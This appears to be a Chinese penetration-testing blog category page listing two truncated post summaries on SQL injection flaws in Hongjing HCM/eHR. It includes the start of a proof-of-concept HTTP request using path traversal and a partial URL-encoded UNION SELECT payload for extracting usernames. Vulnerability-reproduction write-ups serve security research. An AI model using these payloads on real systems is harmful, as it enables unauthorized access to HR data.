随笔分类 - 渗透测试
宏景HCM pos_dept_post sql注入漏洞
摘要:漏洞复现: poc: POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW
宏景HCM codesettree sql注入
摘要:适用范围:宏景eHR < 8.2 登录页面 查询cusername: /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2
